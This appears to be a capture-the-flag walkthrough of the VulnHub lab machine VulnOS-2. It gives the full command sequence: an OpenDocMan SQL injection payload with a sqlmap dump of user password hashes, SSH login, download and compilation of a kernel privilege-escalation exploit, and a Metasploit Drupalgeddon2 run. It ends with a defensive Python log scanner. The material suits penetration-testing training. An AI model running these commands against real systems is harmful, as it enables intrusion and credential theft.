CTF Walk Through | HackProof Academy



01/12/2024 | Shad Hussain | Knowledge
CTF Walk Through - VulnOs-2 - VulnHub

Machine Link : https://www.vulnhub.com/entry/vulnos-2,147/

STEP1
    arp-scan -l      -- to get the victim IP
FINDING
    192.168.0.102
-------------------------------------------------------------
STEP2
    nmap -T4 -sSV -p- 192.168.0.102 -Pn -A
FINDING
    22/tcp   open  ssh   OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http  Apache httpd 2.4.7 ((Ubuntu))
    6667/tcp open  irc   ngircd
    OS details: Linux 3.2 - 4.9
-------------------------------------------------------------
STEP3
    Open the site in a browser using the IP and click on "website" (in red, at the bottom of the page).
-------------------------------------------------------------
STEP4
    feroxbuster -u http://192.168.0.104/jabc/
FINDING
    192.168.0.104/jabc/modules/blog/blog.info
        version = "7.26"
        project = "drupal"
    http://192.168.0.104/jabc/modules/node/node.test   (XSS popup)
-------------------------------------------------------------
STEP5
    Click on the Document tab and view the page source.
FINDING
    /jabcd0cs/ at line 142
-------------------------------------------------------------
STEP6
    dirb http://192.168.0.104/jabcd0cs/
    http://192.168.0.104/jabcd0cs/      -- it is a login page
NOTE -- the version string "OpenDocMan v1.2.7" is at the bottom of the page; search for an exploit for it
FINDING
    https://www.exploit-db.com/exploits/32075
    http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
        -- SQL injection vulnerability described in the exploit

    sqlmap -u "http://192.168.0.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --dbms=mysql --dbs -p add_value --dump
FINDING
    +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
    | id | Email              | phone       | password                                 | username | last_name | department | first_name | pw_reset_code |
    +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
    | 1  | [email protected]  | 5555551212  | b78aae356709f8c31118ea613980954b         | webmin   | min       | 2          | web        | blank         |
    | 2  | [email protected]  | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest    | guest     | 2          | guest      | NULL          |
    | 3  | [email protected]  | 9999999999  | b438079e6d6db31c2aad9fdf1032e756         | C        | A         | 1          | B          | NULL          |
    | 4  | [email protected]  | 9999999999  | 3b253eadc522d0a2294eb492aba9b28c         | U        | L         | 2          | F          | NULL          |
    | 5  | [email protected]  | 123 4567890 | 64cc3db263af674b6b01fae1fc30bc7b         | USERNAME | LAST      | 2          | FIRST      | NULL          |
    +----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+

    webmin -- webmin1980 (password)
    guest  -- guest (password)
-------------------------------------------------------------
STEP6
    ssh [email protected] -p 22      -- with password webmin1980
-------------------------------------------------------------
STEP7
    python -c 'import pty; pty.spawn("/bin/bash")'
-------------------------------------------------------------
STEP8
    uname -r
FINDING
    3.13.0-24-generic
-------------------------------------------------------------
STEP9
    Search for a kernel exploit for 3.13.0-24-generic.
FINDING
    https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------
STEP10
    On the terminal:
    cd /tmp
    wget https://www.exploit-db.com/download/37292
    ls
    webmin@VulnOSv2:/tmp$ cp 37292 37292.c
    webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
    webmin@VulnOSv2:/tmp$ ./exploitt.c
    whoami      -- you will be root
    # cd /root
    # ls
    flag.txt
    # cat flag.txt
    Hello and welcome.
    You successfully compromised the company "JABC" and the server completely !!
    Congratulations !!!
    Hope you enjoyed it.
    What do you think of A.I.?

=============WITH MSFCONSOLE===============================
STEP5
    service postgresql start && msfconsole      -- open msfconsole
    msf6 > search exploit drupal
    msf6 > use 1
    [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.0.104
    rhosts => 192.168.0.104
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /jabc/
    targeturi => /jabc/
    msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
-------------------------------------------------------------
STEP6
    meterpreter shell
-------------------------------------------------------------
STEP7
    python -c 'import pty; pty.spawn("/bin/bash")'
-------------------------------------------------------------
STEP8
    uname -r
FINDING
    3.13.0-24-generic
-------------------------------------------------------------
STEP9
    Search for a kernel exploit for 3.13.0-24-generic.
FINDING
    https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------
STEP10
    On the terminal:
    cd /tmp
    wget https://www.exploit-db.com/download/37292
    ls
    webmin@VulnOSv2:/tmp$ cp 37292 37292.c
    webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
    webmin@VulnOSv2:/tmp$ ./exploitt.c
    whoami      -- you will be root
    # cd /root
    # ls
    flag.txt
    # cat flag.txt
    Hello and welcome.
    You successfully compromised the company "JABC" and the server completely !!
    Congratulations !!!
    Hope you enjoyed it.
    What do you think of A.I.?
-------------------------------------------------------------
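
DEFENDER NOTE (added example, not part of the original walkthrough or of OpenDocMan): the injection in STEP6 rides in the add_value parameter of ajax_udf.php, so the same allow-list check can both validate the parameter server-side and flag abuse in web logs. The sketch below assumes Apache "combined" log format and that a legitimate add_value is a bare identifier such as the odm_user value shown in STEP6; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2024:10:00:05 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 734 "-" "sqlmap/1.0 (constructed)"
198.51.100.9 - - [10/Jan/2024:10:00:09 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
this line is not in combined format and must be skipped
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"'
)
# Assumption: a legitimate add_value is a bare table-style identifier (odm_user in STEP6).
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def is_safe_add_value(value):
    """Allow-list check the application itself could apply before building SQL."""
    return IDENT_RE.fullmatch(value) is not None


def scan(log_text):
    """Return one finding per ajax_udf.php request whose add_value is not an identifier."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue  # malformed or non-combined line
        url = urlsplit(m["target"])
        if not url.path.endswith("/ajax_udf.php"):
            continue
        # parse_qs percent-decodes, so %20 and %28 cannot hide the injected SQL
        for value in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
            if not is_safe_add_value(value):
                findings.append({"client": m["client"], "time": m["time"],
                                 "status": m["status"], "agent": m["agent"],
                                 "add_value": value})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only GET query strings appear in access logs, so this covers the request shape shown in STEP6; the lasting fix is rejecting non-identifier values in the application and using parameterized queries.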

 





© mutebreak.com | All Rights Reserved